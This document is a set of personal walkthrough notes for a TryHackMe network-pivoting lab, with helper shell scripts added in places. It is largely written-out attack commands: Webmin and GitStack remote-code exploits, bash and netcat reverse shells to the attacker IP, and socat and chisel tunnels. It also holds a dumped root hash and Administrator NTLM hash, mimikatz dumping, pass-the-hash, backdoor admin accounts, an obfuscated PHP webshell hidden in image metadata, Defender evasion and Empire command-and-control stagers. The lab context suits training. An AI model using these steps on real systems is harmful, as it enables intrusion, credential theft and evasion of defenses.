TryHackMe WREATH

The document outlines various techniques for network penetration testing, including port scanning, exploiting vulnerabilities, and establishing reverse shells using tools like nmap, socat, and chisel. It provides specific commands and methods for tunneling, proxying, and port forwarding to access internal networks through compromised machines. Additionally, it discusses the use of SSH for creating secure connections and the importance of enumeration in identifying potential targets within a network.

Uploaded by doomslayer.1537

MY IP : 10.50.86.34
First webserver: 10.200.85.200
https://github.com/andrew-d/static-binaries -- static binaries
https://github.com/ernw/static-toolbox/releases/download/1.04/nmap-7.80SVN-x86_64-a36a34aa6-portable.zip -- nmap static
https://www.sans.org/blog/pen-test-poster-white-board-powershell-built-in-port-scanner/ -- PowerShell built-in port scanner
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done -- ping sweep bash one-liner
for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done -- port scan bash one-liner (/dev/tcp needs bash, not sh)
https://github.com/MuirlandOracle/C-Sharp-Port-Scan -- C# port scanner
https://github.com/MuirlandOracle/CPP-Port-Scanner -- C++ port scanner

nmap -A 10.200.85.200 -p1-15000 -oA initial_scan_wreath -v


echo "10.200.85.200 thomaswreath.thm" >> /etc/hosts

FIRST MACHINE
---------------------------------------------------------------------
Found a second web server on port 10000: MiniServ 1.890 (Webmin httpd), vulnerable to RCE (CVE-2019-15107)
Use the exploit https://github.com/MuirlandOracle/CVE-2019-15107
Download the exploit and install its requirements: cd CVE-2019-15107 && pip3 install -r requirements.txt
Execute the script to get a (pseudo-)shell on the webserver as root
For a proper reverse shell, set up a listener: rlwrap -cAr nc -lvnp 4444
/bin/sh -i >& /dev/tcp/10.50.86.34/4444 0>&1 -- on the victim (the >& /dev/tcp redirection needs bash)
root password hash (from /etc/shadow; the $6$ prefix means SHA-512 crypt):
$6$i9vT8tk3SoXXxK2P$HDIAwho9FOdd4QCecIJKwAwwh8Hwl.BdsbMOUAd3X/chSCvrmpfy.5lrLgnRVNq6/6g0PxK9VqSdy47/qKXad1
we cannot crack the password
but since SSH is open we can copy root's SSH keys (/root/.ssh/) and use those to log in to the server again
copy the private key and chmod 600 it, otherwise ssh refuses to use it
OR
add our own public key to /root/.ssh/authorized_keys on the victim so we can log in with plain ssh and no password
chattr -i authorized_keys -- if the file cannot be modified (immutable attribute set), clear the attribute first
------------------------------------------------------------------------
THEORY
------------------------------------------------------------------------
Tunnelling/Proxying: Creating a proxy type connection through a compromised machine
in order to route all desired traffic into the targeted network. This could
potentially also be tunnelled inside another protocol (e.g. SSH tunnelling), which
can be useful for evading a basic Intrusion Detection System (IDS) or firewall
Port Forwarding: Creating a connection between a local port and a single port on a
target, via a compromised host

Initial enum for pivot


arp -a
/etc/hosts
/etc/resolv.conf
nmcli dev show
C:\Windows\System32\drivers\etc\hosts
ipconfig /all
for i in {1..255}; do (ping -c 1 192.168.1.${i} | grep "bytes from" &); done -- ping sweep bash one-liner
for i in {1..65535}; do (echo > /dev/tcp/192.168.1.1/$i) >/dev/null 2>&1 && echo $i is open; done -- port scan bash one-liner
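The two one-liners above, rewritten as reusable shell functions. This is an added example, not code from the original notes: a TCP connect probe with a timeout (so filtered ports do not hang the loop), a port-range expander, and a concurrent ping sweep. It assumes bash and coreutils `timeout` and `seq` exist on the pivot host, and that `ping -W` is the Linux iputils timeout flag; the /dev/tcp probe runs in an explicit bash child so the file itself can be run by /bin/sh.

```shell
#!/bin/sh
# Added example, not part of the original notes.
# Host and port discovery from a pivot that has no nmap: only bash,
# coreutils `timeout`, `seq` and `ping` are assumed to be present.

# tcp_port_open HOST PORT -> exit 0 if a TCP connect succeeds within 1s.
# /dev/tcp is a bash feature, so the probe runs in an explicit bash child;
# timeout stops filtered ports (no RST, no SYN/ACK) from hanging the scan.
tcp_port_open() {
    timeout 1 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# expand_ports "22,80-82,443" -> "22 80 81 82 443"
expand_ports() {
    out=
    old_ifs=$IFS
    IFS=','
    for spec in $1; do
        case $spec in
            *-*)
                lo=${spec%-*}
                hi=${spec#*-}
                while [ "$lo" -le "$hi" ]; do
                    out="$out $lo"
                    lo=$((lo + 1))
                done
                ;;
            *)
                out="$out $spec"
                ;;
        esac
    done
    IFS=$old_ifs
    printf '%s\n' "${out# }"
}

# scan_ports HOST PORTSPEC -> prints each open port on its own line.
scan_ports() {
    for p in $(expand_ports "$2"); do
        if tcp_port_open "$1" "$p"; then
            printf '%s\n' "$p"
        fi
    done
}

# ping_sweep PREFIX (e.g. 10.200.85) -> prints hosts answering one ICMP echo.
# Probes run concurrently in the background; wait collects them all.
ping_sweep() {
    for i in $(seq 1 254); do
        ( ping -c 1 -W 1 "$1.$i" >/dev/null 2>&1 && printf '%s\n' "$1.$i" ) &
    done
    wait
}

# Usage from the pivot:
#   ping_sweep 10.200.85
#   scan_ports 10.200.85.150 "1-1024,3389,5985"
```

Hosts behind a host firewall that drops ICMP (as .100 does later in these notes) will not show up in the ping sweep, so scan the known-alive hosts' ports anyway before concluding a host is down.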

PROXYCHAINS
When creating a proxy we open a port on our own attacking machine which is linked to the compromised server, giving us access to the target network.
Proxychains is a command line tool which is activated by prepending proxychains to other commands, e.g. to push netcat through the proxy, prepend it to the nc command.
Master config file -- /etc/proxychains.conf
ORDER OF SEARCH FOR CONFIG FILE
The current directory (i.e. ./proxychains.conf)
~/.proxychains/proxychains.conf
/etc/proxychains.conf
set the socks4 line to the desired port and comment out proxy_dns with # before using nmap
proxychains nmap -sT 10.200.85.150 -p1-500 -Pn -- only TCP connect scans work through a SOCKS proxy (no -sS, no ICMP host discovery, hence -Pn); it is slow, so keep port ranges small
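Editing the proxychains config as described above, as an added example that is not from the original notes: one function rewrites the active proxy line and comments out proxy_dns, another checks the file before nmap is pointed at it. It assumes the stock Kali file layout (one active `socks4 127.0.0.1 9050` line under [ProxyList] and a `proxy_dns` line); the demo works on a constructed copy, never on /etc/proxychains.conf directly.

```shell
#!/bin/sh
# Added example, not part of the original notes.
# Rewrite a proxychains.conf for a single SOCKS proxy and check the result
# before pointing nmap at it. Assumes the stock file layout: a [ProxyList]
# section with one active "socks4 127.0.0.1 9050" line and a "proxy_dns"
# line. Plain POSIX sed (no -i), so GNU and BSD both work.

# set_proxy CONF PROTO PORT -> replaces the active proxy line with
# "PROTO 127.0.0.1 PORT" and comments out proxy_dns.
set_proxy() {
    conf=$1 proto=$2 port=$3
    sed -e "s/^socks[45][[:space:]].*/$proto 127.0.0.1 $port/" \
        -e "s/^http[[:space:]].*/$proto 127.0.0.1 $port/" \
        -e 's/^proxy_dns/#proxy_dns/' "$conf" > "$conf.tmp" &&
        mv "$conf.tmp" "$conf"
}

# check_proxy_conf CONF -> prints "ok" and exits 0 when exactly one proxy
# line is active and proxy_dns is off; otherwise prints the problem, exits 1.
check_proxy_conf() {
    n=$(grep -Ec '^(socks[45]|http)[[:space:]]' "$1" || true)
    if [ "$n" -ne 1 ]; then
        echo "expected exactly one active proxy line, found $n"
        return 1
    fi
    if grep -q '^proxy_dns' "$1"; then
        echo "proxy_dns is still enabled; comment it out before using nmap"
        return 1
    fi
    echo ok
}

# Demo on a constructed copy of a stock config (never edits /etc directly).
demo_conf() {
    tmp=$(mktemp)
    printf 'strict_chain\nproxy_dns\ntcp_read_time_out 15000\n' > "$tmp"
    printf '[ProxyList]\nsocks4\t127.0.0.1 9050\n' >> "$tmp"
    set_proxy "$tmp" socks5 1080       # chisel and ssh -D both speak SOCKS5
    check_proxy_conf "$tmp" && cat "$tmp"
    rm -f "$tmp"
}

# Usage once the real file is edited:
#   proxychains nmap -sT -Pn -p1-500 10.200.85.150
```

proxychains only intercepts TCP connect() calls, so the scan still has to be `nmap -sT -Pn`; with proxy_dns left on, proxychains hooks name resolution as well and nmap tends to hang or crash, which is why the notes say to comment it out.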

FOXYPROXY
For proxying web traffic

PORT FORWARD
e.g. if the ssh server 172.16.0.5 can connect to the webserver 172.16.0.10 but we cannot, then use
ssh -L 8000:172.16.0.10:80 user@172.16.0.5 -fN -- now connect to localhost:8000; the traffic is routed through the ssh server to the webserver (-f backgrounds ssh, -N runs no remote command)

PROXY
ssh -D 1337 user@ssh_server -fN -- opens a SOCKS proxy on our port 1337 that routes traffic through the ssh server into the target network. Set this port in proxychains and prefix tools with proxychains to send them through the ssh server.

REVERSE
-------------
if we have a shell on the target and it has an ssh client but no ssh server, we make the target connect back to an ssh server on our attacking machine
ssh-keygen -- on the attacking machine, generate a dedicated key pair for this
copy the content of the .pub file into ~/.ssh/authorized_keys on the attacking machine, prefixed with
command="echo 'This account can only be used for port forwarding'",no-agent-forwarding,no-x11-forwarding,no-pty
paste this in front of our public key (same line). It tells sshd that this key may only be used for forwarding: anyone holding the private key (which we will leave on a compromised host) gets no shell on our box.
restart the ssh service on our machine
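The forwarding-only key entry above, as an added example that is not from the original notes: one function builds the restricted line, one installs it with the permissions sshd requires, and one audits an authorized_keys file for any key that would still hand out a shell (worth running before leaving our private key on a compromised host). It assumes OpenSSH; the key strings in the usage comment and test are placeholders, not real keys.

```shell
#!/bin/sh
# Added example, not part of the original notes.
# Build the forwarding-only authorized_keys entry and audit an
# authorized_keys file for keys that would still hand out a shell.
# Assumes OpenSSH; the key in the usage comment is a placeholder.

FORWARD_ONLY_OPTS='command="echo '\''This account can only be used for port forwarding'\''",no-agent-forwarding,no-x11-forwarding,no-pty'

# forward_only_entry "ssh-ed25519 AAAA... comment" -> the restricted line
forward_only_entry() {
    printf '%s %s\n' "$FORWARD_ONLY_OPTS" "$1"
}

# install_forward_only_key PUBKEY_FILE [AUTHORIZED_KEYS]
# Appends the restricted entry with the permissions sshd insists on.
install_forward_only_key() {
    ak=${2:-$HOME/.ssh/authorized_keys}
    mkdir -p "$(dirname "$ak")"
    chmod 700 "$(dirname "$ak")"
    forward_only_entry "$(cat "$1")" >> "$ak"
    chmod 600 "$ak"
}

# unrestricted_keys AUTHORIZED_KEYS -> prints FILE:LINE: entry for every key
# that lacks command= and no-pty (i.e. would give a shell). Exit 0 if none.
unrestricted_keys() {
    awk '
        /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }   # comments and blanks
        /command=/ && /no-pty/ { next }                  # restricted as intended
        { print FILENAME ":" NR ": " $0; bad = 1 }
        END { exit bad }
    ' "$1"
}

# Usage on the attacking machine:
#   install_forward_only_key relay_key.pub      # key the pivot will use with -i
#   unrestricted_keys ~/.ssh/authorized_keys    # anything printed is a shell key
```

OpenSSH 7.8 and later also accept `permitlisten="PORT"` in the same option list to pin which ports a `-R` forward may bind; the room does not use it, but it is a tighter fit for an account whose only job is one reverse forward.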

Now again suppose we have one compromised machine (ssh client) and a target webserver reachable only by the compromised machine.
use this command on the compromised machine (KEYFILE is the private key generated above, transferred to the compromised host):
ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -fN
e.g. ssh -R 8000:172.16.0.10:80 USERNAME@ATTACKING_IP -i KEYFILE -fN
now if we connect to our localhost:8000 it will be redirected to the target webserver

REVERSE PROXY
ssh -R 1337 USERNAME@ATTACKING_IP -i KEYFILE -fN -- opens a SOCKS proxy on our localhost port 1337 that redirects our traffic into the target network (reverse dynamic forwarding needs OpenSSH 7.6 or newer on both ends)

PLINK.EXE
https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html
/usr/share/windows-resources/binaries/plink.exe -- also here on Kali
Windows command-line PuTTY ssh client
cmd.exe /c echo y | .\plink.exe -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP -i KEYFILE -N -- reverse port forward using plink.exe (echo y answers the host key prompt, since there is no interactive terminal)
E.g. compromised machine 172.16.0.5, target server 172.16.0.10:80, attack IP 172.16.0.20
Execute on the compromised host
cmd.exe /c echo y | .\plink.exe -R 8000:172.16.0.10:80 USERNAME@172.16.0.20 -i KEYFILE -N

OpenSSH keys from ssh-keygen do not work with plink; convert them to PuTTY format

install puttygen using 'sudo apt install putty-tools'
puttygen KEYFILE -o OUTPUT_KEY.ppk -- this .ppk file is usable by plink.exe

SOCAT
https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
https://sourceforge.net/projects/unix-utils/files/socat/1.7.3.2/socat-1.7.3.2-1-x86_64.zip/download -- Windows build
Good for relays (redirecting connections)

SOCAT REVERSE SHELL RELAY

transfer socat and nc to the victim
on the attacker: nc -lvnp 443
on the victim: socat tcp-l:8000 tcp:attacker:443 &
now if any machine connects to the compromised host on port 8000, the connection is relayed to the attacker
e.g. nc ip_compromised 8000 -e /bin/bash -- from a second target; the shell is relayed back to the attacker on 443

SOCAT PORT FORWARD -- EASY METHOD -- OPENS PORT ON COMPROMISED HOST

set up a listening port on the compromised host and forward traffic received on it to the target server
e.g. if we want to connect to a target server on the network with a mysql service open
socat tcp-l:33060,fork,reuseaddr tcp:target_server:3306 & -- fork handles each connection in a separate child so the listener keeps accepting, reuseaddr sets SO_REUSEADDR so the port can be bound again straight away
now connect to compromised_host:33060 to reach the mysql service

SOCAT PORT FORWARD -- QUIET METHOD -- DOES NOT OPEN PORT ON COMPROMISED HOST
on the attacker: socat tcp-l:8001 tcp-l:8000,fork,reuseaddr &
on the victim: socat tcp:attack_ip:8001 tcp:target_ip:port,fork &
e.g.
./socat tcp:10.50.73.2:8001 tcp:172.16.0.10:80,fork &
the victim connects out to our 8001, so nothing listens on the victim; when we connect to localhost:8000 the traffic reaches the target through the relay

to kill the cats,


jobs
kill %NUMBER

CHISEL
https://github.com/jpillora/chisel/releases
For easy proxy and port forwarding without ssh
2 modes -- client and server
chisel client|server --help
chisel client --help
Usage: chisel client [options] <server> <remote> [remote] [remote] ...

<server> is the URL to the chisel server.

<remote>s are remote connections tunneled through the server, each of which come in the form:

<local-host>:<local-port>:<remote-host>:<remote-port>/<protocol>

- local-host defaults to 0.0.0.0 (all interfaces).
- local-port defaults to remote-port.
- remote-port is required*.
- remote-host defaults to 0.0.0.0 (server localhost).
- protocol defaults to tcp.

which shares <remote-host>:<remote-port> from the server to the client as <local-host>:<local-port>, or:

R:<local-interface>:<local-port>:<remote-host>:<remote-port>/<protocol>

which does reverse port forwarding, sharing <remote-host>:<remote-port> from the client to the server's <local-interface>:<local-port>.

When the chisel server has --socks5 enabled, remotes can specify "socks" in place of remote-host and remote-port. The default local host and port for a "socks" remote is 127.0.0.1:1080. Connections to this remote will terminate at the server's internal SOCKS5 proxy.

When the chisel server has --reverse enabled, remotes can be prefixed with R to denote that they are reversed. That is, the server will listen and accept connections, and they will be proxied through the client which specified the remote. Reverse remotes specifying "R:socks" will listen on the server's default socks port (1080) and terminate the connection at the client's internal SOCKS5 proxy.

CHISEL REVERSE SOCKS PROXY

the compromised host connects back to the attacker
./chisel server -p listen_port --reverse & -- on the attacker; --reverse lets the connecting client (the compromised host) define the remote
./chisel client attack_ip:listen_port R:socks & -- on the compromised host
the proxy opens on 127.0.0.1:1080 on the attacker

CHISEL FORWARD SOCKS PROXY -- when the compromised host cannot connect out to us (e.g. egress is blocked) but we can reach a port on it, as in the second pivot later
./chisel server -p listen_port --socks5 -- on the compromised host
./chisel client target_ip:target_port proxy_port:socks -- on the attacker; connects to the chisel server on target_port and opens a SOCKS proxy on our proxy_port
e.g. ./chisel client 172.16.0.10:8080 1080:socks

NOTE: chisel serves SOCKS5, so for both chisel proxies change the proxychains line from socks4a to socks5; port 1080 is the default for the reverse proxy, for the forward proxy we choose the port on the command line

CHISEL REMOTE PORT FORWARD

A remote port forward is when we connect back from a compromised target to create the forward.
./chisel server -p LISTEN_PORT --reverse & -- on the attacker
./chisel client ATTACKING_IP:LISTEN_PORT R:LOCAL_PORT:TARGET_IP:TARGET_PORT & -- on the compromised host
Here LISTEN_PORT is the port we started the chisel server on, and LOCAL_PORT is the port we wish to open on our own attacking machine to link with the desired target port.
e.g. attacker 172.16.0.20, compromised host 172.16.0.5, target 172.16.0.10:22
./chisel server -p 1337 --reverse & -- on the attacker
./chisel client 172.16.0.20:1337 R:2222:172.16.0.10:22 & -- on the compromised host
now connect to 127.0.0.1:2222 to reach the forwarded port

CHISEL LOCAL PORT FORWARD


./chisel server -p LISTEN_PORT -- on compromised host
./chisel client LISTEN_IP:LISTEN_PORT LOCAL_PORT:TARGET_IP:TARGET_PORT -- on
attacker

For example, to connect to 172.16.0.5:8000 (the compromised host running a chisel


server), forwarding our local port 2222 to 172.16.0.10:22 (our intended target), we
could use:
./chisel client 172.16.0.5:8000 2222:172.16.0.10:22

SSHUTTLE
Only works with Linux targets (it needs SSH access and Python on the pivot host)
sshuttle -r user@compromised_host subnet
e.g.
sshuttle -r user@172.16.0.5 172.16.0.0/24
sshuttle -r username@address -N -- -N auto-detects the subnet from the pivot's routing table -- not always successful
add & to background the commands

if key based authentication is required use

sshuttle -r user@address --ssh-cmd "ssh -i KEYFILE" SUBNET

if the connection breaks, exclude the pivot host itself with -x, otherwise sshuttle tries to route its own SSH session to the pivot through the tunnel, e.g.
sshuttle -r user@172.16.0.5 172.16.0.0/24 -x 172.16.0.5

THEORY SUMMARY
Proxychains and FoxyProxy are used to access a proxy created with one of the other
tools
SSH can be used to create both port forwards, and proxies
plink.exe is an SSH client for Windows, allowing you to create reverse SSH
connections on Windows
Socat is a good option for redirecting connections, and can be used to create port
forwards in a variety of different ways
Chisel can do the exact same thing as with SSH portforwarding/tunneling, but
doesn't require SSH access on the box
sshuttle is a nicer way to create a proxy when we have SSH access on a target
---------------------------------------------------------------------------------
ENUMERATION FROM COMPROMISED SERVER
---------------------------------------------------------------------------------
copy nmap binary and scan the subnet
found .100 and .150 as alive hosts
Nmap scan report for ip-10-200-85-150.eu-west-1.compute.internal (10.200.85.150)
Host is up (0.00048s latency).
Not shown: 65520 closed ports
PORT STATE SERVICE
80/tcp open http
135/tcp open epmap
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
15997/tcp open unknown
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49669/tcp open unknown
49671/tcp open unknown
49675/tcp open unknown
MAC Address: 02:42:D5:22:E3:B3 (Unknown)
---------------------------------------
PIVOTING
---------------------------------------
WAYS OF ACCESSING THE INTERNAL SITE (.150:80)
ssh -L 4444:10.200.85.150:80 root@10.200.85.200 -fN -- SSH LOCAL PORT FORWARDING -- now browse to localhost:4444 and the site loads

FOR SSH REVERSE PORT FORWARD our public key must be in authorized_keys on our own machine (the victim connects back to us with the matching private key). then on the victim run
ssh -R 8000:10.200.85.150:80 root@10.50.86.34 -fN -- (add -i KEYFILE if the key is not in the default location) now browse to localhost:8000 and the site loads again

FOR SSH DYNAMIC PORT FORWARDING

ssh -D 1337 root@10.200.85.200 -fN -- set the socks4 port to 1337 in the proxychains conf file. Now use proxychains (or FoxyProxy in the browser) to access the URL and it works as intended.

FOR SOCAT PORT FORWARD

socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & -- on the attacker
socat tcp:10.50.86.34:8001 tcp:10.200.85.150:80,fork & -- on the victim
now browse to localhost:8000 and the traffic reaches .150 on port 80

FOR CHISEL REVERSE PROXY

./chisel server -p 1337 --reverse -- on the attacker
./chisel client 10.50.86.34:1337 R:socks & -- on the compromised host
the server prints that the proxy is listening on 1080, so we set socks5 127.0.0.1 1080 in the proxychains file
now proxychains curl http://10.200.85.150/ (or the browser via FoxyProxy) reaches the site

sshuttle for initial access into the network -- best for interacting directly but not good for nmap
sshuttle -r root@10.200.85.200 10.200.85.0/24 -x 10.200.85.200

now open the http link of .150

found an error on the page
found the /gitstack link; default credentials did not work
searchsploit gitstack -- found an RCE
searchsploit -m 43777 -- -m copies the exploit to the current directory
since we are on Linux, run dos2unix 43777.py to fix the CRLF line endings
check whether the exploit is python 2 or 3 -- quick check: if print uses (), it is python 3
set the target IP in the exploit and rename exploit.php to exploit-NAME.php so we do not collide with other users of the shared lab
now we can either keep changing the command in the script or, better, use curl against the dropped webshell, e.g.
curl -X POST http://10.200.85.150/web/exploit-sundeel.php -d "a=whoami"
a= can be any command we want
e.g. use ping to check whether the 2nd victim can reach our attacker IP directly
start tcpdump on our machine to watch for the incoming ICMP: tcpdump -i tun0 icmp

our .200 is CentOS with a very restrictive firewall, as we saw while trying different payloads earlier
to open a specific relay port we use
firewall-cmd --zone=public --add-port PORT/tcp -- zone public covers inbound connections -- i opened port 31337 (without --permanent this is a runtime rule that disappears on reload/reboot, which is what we want on a client's box)

next we use a PowerShell reverse shell to connect back to the .200 host -- (NOT COPYING THE PAYLOAD HERE SINCE DEFENDER KEEPS DEFEATING THE FILE)

use the Burp Inspector to URL-encode the payload so it can be sent in the request

Now to route the reverse shell from the compromised host to our attack machine we set up a socat relay
on the attack machine: nc -lvnp 1337
on the compromised host: socat tcp-l:31337 tcp:10.50.86.34:1337 &
now when the second victim connects to the first on port 31337 it is routed to our nc listener on port 1337

--------------------------------------------------------------------
STABILISATION AND POST EXPLOITATION
--------------------------------------------------------------------
We know that open ports on .150 include 3389 (RDP) and 5985 (WinRM), so we can either RDP in or use WinRM. We need a user with RDP rights or membership of "Remote Management Users", or we add our own user to Administrators.
since we are NT AUTHORITY\SYSTEM we can create our own admin user on the system
net user USERNAME PASSWORD /add
net localgroup Administrators USERNAME /add
net localgroup "Remote Management Users" USERNAME /add -- needed for evil-winrm

Now log in with evil-winrm -- evil-winrm -u sundeel -p sundeel12 -i 10.200.85.150
For RDP we use xfreerdp
xfreerdp /u:sundeel /p:sundeel12 /cert:ignore /v:10.200.85.150 /dynamic-resolution +clipboard /drive:<kali dir>,<share name on victim>
a good dir to share is /usr/share/windows-resources
now we run mimikatz from the share: \\tsclient\sundeel-share\mimikatz\x64\mimikatz.exe
privilege::debug
token::elevate
then dump the password hashes -- lsadump::lsa /patch (or lsadump::sam)
from THOMAS's hash we can find his password using crackstation: i<3ruby
Admin Hash: 37db630168e5f82aafa8461e05c6bbd1
We can log in as Administrator with pass-the-hash via evil-winrm
evil-winrm -u 'Administrator' -H '37db630168e5f82aafa8461e05c6bbd1' -i 10.200.85.150
-----------------------------------------------------------------------------------
COMMAND AND CONTROL
-----------------------------------------------------------------------------------
https://www.thec2matrix.com/
PowerShell Empire -- now maintained by BC Security
Starkiller is its GUI
sudo apt install powershell-empire starkiller -- install both
Start the Empire server
sudo powershell-empire server -- wait for the server to load
sudo powershell-empire client -- the CLI client
the client automatically connects to the server on localhost
if the server is hosted somewhere else then enter in the client
connect HOSTNAME --username=USERNAME --password=PASSWORD
starkiller -- command to start Starkiller
empireadmin:password123 -- default credentials

4 MAIN PARTS
Listeners -- listen for a connect back
Stagers -- payloads for reverse shell
Agents -- send commands to remote hosts like sessions in msf
Modules -- facilitate further exploitation

***LISTENERS***
CLI
uselistener <type> -- http type is most common
options -- view options to set for listener
set option <value> -- e.g set name sundeel-http
execute --- starts listener
back -- to go back from this menu
main -- goes to main menu

STARKILLER
Go to listeners >> create >> choose type and set options and it will start
listening

***STAGERS***
CLI
usestager <type> -- multi/launcher is good, for now we use multi/bash
set Listener <our listener name>
execute

STARKILLER
Go to Stagers >> create >> type multi/bash >> bind to our listener >> start
now copy the stager's payload and save it in a file

***AGENTS***
CLI
once a stager is executed on a victim an agent will start up in empire
agents -- command to see active agents
interact <agent name>
help -- to see which commands we can execute
kill <agent name>

STARKILLER
run stager on victim to get a connect back
it will show in agent window when successful

***HOP LISTENERS*** important for proxying agent traffic from machines with no outbound access
Here set a name
choose host and port of the jump server, e.g. 10.200.85.200 will be the host
RedirectListener -- the name of the normal http listener created earlier
CLI: uselistener http_hop
set Host <compromised server>
set Port <port>
execute

***Hop Listener Stager***

from the listener drop-down choose the hop listener
and language as powershell
execute
stager files are created in /tmp/http_hop
zip all files inside the directory: zip -r <outfile>.zip *
send these files to the victim
unzip hop.zip -- on the victim
now on the victim open the port set in the hop listener in the firewall
firewall-cmd --zone=public --add-port PORT/tcp
Next, since we know php is installed on the system already, we use it to host the files:
php -S 0.0.0.0:PORT &>/dev/null &
python's http.server would serve the .php files as plain text instead of executing them, which is why the php built-in webserver is used
now on the 2nd victim we run the hop stager powershell script, either from the evil-winrm shell or from the webshell we got
once executed we receive the agent from the 2nd host, which is not directly reachable from our attacking machine

MODULES
CLI
interact <agent>
usemodule <module name> e.g. powershell/privesc/sherlock -- checks for privesc vectors on the target
We can see module results directly from the agent
OR
go to Modules, choose the module type >> choose the agent >> then see results under Reporting once done

SHELL
from the CLI enter shell to use a shell on the agent
in Starkiller the shell is under the agent's settings
-----------------------------------------------------------------------------------
ENUMERATION OF LAST HOST
-----------------------------------------------------------------------------------
we need to find the last host from the git server which we compromised, but running tools through two proxies won't work well
since we have an evil-winrm shell on the 2nd target we can use the upload and download capabilities of evil-winrm
upload LOCAL_FILEPATH REMOTE_FILEPATH
download REMOTE_FILEPATH LOCAL_FILEPATH
with evil-winrm we can also set a path to load powershell scripts directly into the winrm session without writing the scripts to the target's disk
for this we use the -s option, e.g.
evil-winrm -u USERNAME -p PASSWORD -i IP -s /opt/scripts
the scripts shipped with Empire are collected in
/usr/share/powershell-empire/empire/server/data/module_source/

network scanning scripts are in
/usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/
Invoke-Portscan.ps1 -- use for port scanning
run evil-winrm as
evil-winrm -u 'Administrator' -H '37db630168e5f82aafa8461e05c6bbd1' -i 10.200.85.150 -s /usr/share/powershell-empire/empire/server/data/module_source/situational_awareness/network/

enter the script name Invoke-Portscan.ps1 in the session to load it

now we can use Get-Help Invoke-Portscan to see the help
Invoke-Portscan -Hosts 10.200.85.100 -TopPorts 50 -- scans the top 50 ports on the host
-----------------------------------------------------------------------------------
2ND PIVOT
-----------------------------------------------------------------------------------
Now we set up a forward proxy on the .150 host so we can proxy our traffic through it to the .100 host
first we open a port in the Windows firewall with netsh
netsh advfirewall firewall add rule name="Chisel-Sundeel" dir=in action=allow protocol=tcp localport=51337
the rule can also be added via PowerShell
New-NetFirewallRule -DisplayName 'My port' -Profile 'Private' -Direction Inbound -Action Allow -Protocol TCP -LocalPort 6624
run this in evil-winrm
Now we transfer chisel to the victim with evil-winrm's upload
now set up the forward proxy
.\chisel.exe server -p 51337 --socks5 -- on the compromised (Windows) host

./chisel client 10.200.85.150:51337 1080:socks -- on the attacker

now point the browser at the SOCKS5 proxy (FoxyProxy, 127.0.0.1:1080) to open the site at
http://10.200.85.100/
First, from host .150 in evil-winrm, we download the website.git directory using
download C:\GitStack\repositories\website.git /root/Desktop/git
this downloads all sub-dirs inside website.git

now we can use smartgit to open the local repo and view the most recent commit
we see changes in /resources/index.php
It will probably ask us for creds
We'll be able to upload image files
There are two filters in play to stop us from uploading other kinds of files
Both filters can be bypassed:
1st, the extension check splits the filename on "." and checks only the first extension against the allowed list, so a file named file.png.php passes the check but is still executed as PHP by the server
2nd, the content check uses getimagesize(), so the file must be a real image; we put the PHP code into the image's comment field with exiftool, e.g. exiftool -comment='<?php echo "<pre>Test Payload</pre>"; die();?>' picture.png
we found thomas's password before as i<3ruby
his username from git is twreath and on the system it was thomas
let us try the credentials
Now we can access
http://10.200.85.100/resources/index.php
http://10.200.85.100/resources/uploads/Screenshot_2022-04-20_17_37_41.png -- sample image upload path
-----------------------------------------------------------------------------------
AV EVASION
-----------------------------------------------------------------------------------
On-disk evasion (a payload written to disk gets scanned)
In-memory evasion (the payload only ever lives in memory)
Veil can be used for AV evasion: https://www.veil-framework.com/
also Shellter: https://www.shellterproject.com/

Anti-Malware Scan Interface (AMSI) -- scans scripts as they execute in memory (PowerShell etc.) -- needs to be bypassed
to find out which AV/EDR products are on the system we can use
https://github.com/PwnDexter/SharpEDRChecker
https://github.com/GhostPack/Seatbelt
sample PHP shell code
<?php
$cmd = $_GET["wreath"];
if(isset($cmd)){
echo "<pre>" . shell_exec($cmd) . "</pre>";
}
die();
?>
now we run it through a PHP obfuscator for evasion: https://www.gaijin.at/en/tools/php-obfuscator
<?php $g0=$_GET[base64_decode('d3JlYXRo')];if(isset($g0)){echo base64_decode('PHByZT4=').shell_exec($g0).base64_decode('PC9wcmU+');}die();?>
the obfuscated code contains single quotes, so the exiftool -comment argument has to go in double quotes; escape each $ as \$ so bash does not expand $g0 and $_GET
now upload and we can execute commands using
http://10.200.85.100/resources/uploads/sundeel-shell.png.php?wreath=whoami

for a reverse shell we need to upload nc, but Defender picks up the default nc.exe; use another version, e.g.
git clone https://github.com/int0x33/nc.exe/

we compile the binary ourselves

// For x64 compile with: x86_64-w64-mingw32-gcc
// For x86 compile with: i686-w64-mingw32-gcc
change the compiler to the 64-bit one in the Makefile, then run make
file nc.exe confirms it is built for a 64-bit system
now we host the file with python's http.server on port 8000
we pull nc onto the victim through the webshell with curl
curl http://ATTACKER_IP/nc.exe -o c:\\windows\\temp\\nc-USERNAME.exe
i.e. request
http://10.200.85.100/resources/uploads/sundeel-shell.png.php?wreath=curl http://10.50.86.34:8000/nc.exe -o c:\\windows\\temp\\nc-sundeel.exe
My shell was uploaded to the xampp directory -- it did not work with temp, don't know why
IN MY CASE \ SLASHES WORKED
now set up a listener on my machine and execute nc on the victim as
powershell.exe c:\\windows\\temp\\n-USERNAME.exe ATTACKER_IP ATTACKER_PORT -e cmd.exe
we get a successful connect back
-----------------------------------------------------------------------------------
ENUM OF LAST HOST
-----------------------------------------------------------------------------------
whoami /priv
whoami /groups
wmic service get name,displayname,pathname,startmode | findstr /v /i "C:\Windows" | findstr /v """
-- lists services outside C:\Windows whose path is not quoted
we found an unquoted service pathname
sc qc SystemExplorerHelpService
sc query SystemExplorerHelpService
Now use the PowerShell Get-Acl cmdlet to check permissions on the path
powershell "get-acl -Path 'C:\Program Files (x86)\System Explorer' | format-list"
all users have FullControl over the directory, so we can write there
